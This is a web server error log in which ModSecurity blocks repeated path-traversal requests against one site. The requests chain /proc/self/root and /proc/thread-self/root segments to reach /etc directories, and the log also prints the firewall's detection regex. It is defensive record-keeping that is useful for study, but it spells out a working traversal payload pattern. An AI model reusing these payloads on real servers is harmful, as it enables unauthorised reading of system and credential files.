[Tue Mar 17 21:58:39.822695 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:57550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4v9Y0UrI5A3LftIwsIQAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:46.755359 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:57566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4xtY0UrI5A3LftIwsKQAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:48.355343 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:42198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4yNY0UrI5A3LftIwsLAAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:58:59.128682 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50368] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:59:01.363621 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:56662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn41eyqAr6etmhZHNpT5wAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:03.303205 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:56668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn418df6f5d65gmYZRsGgAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:03.499153 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.228.61:34970] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn419a6ubjKNq_cu4YzRAAAA1c"]
[Tue Mar 17 21:59:05.027385 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:56678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn42da6ubjKNq_cu4YzRQAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:06.654490 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:56692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn42sdf6f5d65gmYZRsHAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:08.259051 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:56540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn43Mdf6f5d65gmYZRsHgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:09.712311 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:56544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn43ew_le52K8_3pV15XQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:11.342482 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:56548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn434h-PF_25v4hFRCX5gAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:22.149871 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50778] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:59:25.413926 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:56382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn47OyqAr6etmhZHNpT8QAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:30.360382 2026] [:error] [pid 17972:tid 140411708356352] [client 74.7.241.31:43406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn48oZ5-GlpYjVrXCriTwAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:31.979242 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:43418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn48-w_le52K8_3pV15agAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:33.511485 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:43434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn49dY0UrI5A3LftIwsOgAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:35.103304 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:43450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn499a6ubjKNq_cu4YzTQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:36.675206 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:43458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4-AkwaGbbGflqUZCwnwAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:44.097805 2026] [proxy_fcgi:error] [pid 18211:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:59:45.455613 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:38268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5Acdf6f5d65gmYZRsNQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:47.057242 2026] [:error] [pid 25836:tid 140411733534464] [client 74.7.241.31:38276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5A4h-PF_25v4hFRCX7gAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:49.494387 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.241.31:38276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5BIh-PF_25v4hFRCX7wAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:51.075262 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:60982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5B8df6f5d65gmYZRsOAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:52.716691 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:60996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5CMdf6f5d65gmYZRsOgAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:59:52.717544 2026] [mime_magic:error] [pid 17653:tid 140411599251200] (70014)End of file found: [client 74.7.241.31:60996] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
